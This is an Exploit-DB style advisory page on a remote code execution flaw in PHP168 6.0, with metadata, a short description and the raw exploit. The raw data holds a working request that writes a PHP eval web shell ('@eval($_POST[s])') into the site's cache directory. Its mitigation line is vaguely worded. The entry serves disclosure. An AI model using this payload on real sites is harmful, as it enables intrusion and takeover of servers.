PHP168 6.0 Remote Code Execution Vulnerability

vendor:

PHP168

by:

Securitylab.ir

9.8

CVSS

HIGH

Remote Code Execution

CWE

Product Name: PHP168

Affected Version From: 6

Affected Version To: 6

Patch Exists: YES

Related CWE: N/A

CPE: a:php168:php168:6.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

PHP168 6.0 Remote Code Execution Vulnerability

A remote code execution vulnerability exists in PHP168 6.0 due to improper input validation. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of PHP168 6.0 or later.

Source

Exploit-DB raw data:

########################## Securitylab.ir ########################
# Application Info:
# Name: PHP168
# Version: 6.0
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# http://site.com/login.php?makehtml=1&chdb[htmlname]=seek.php&chdb[path]=cache&content=<?php%20@eval($_POST[s]);?>
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################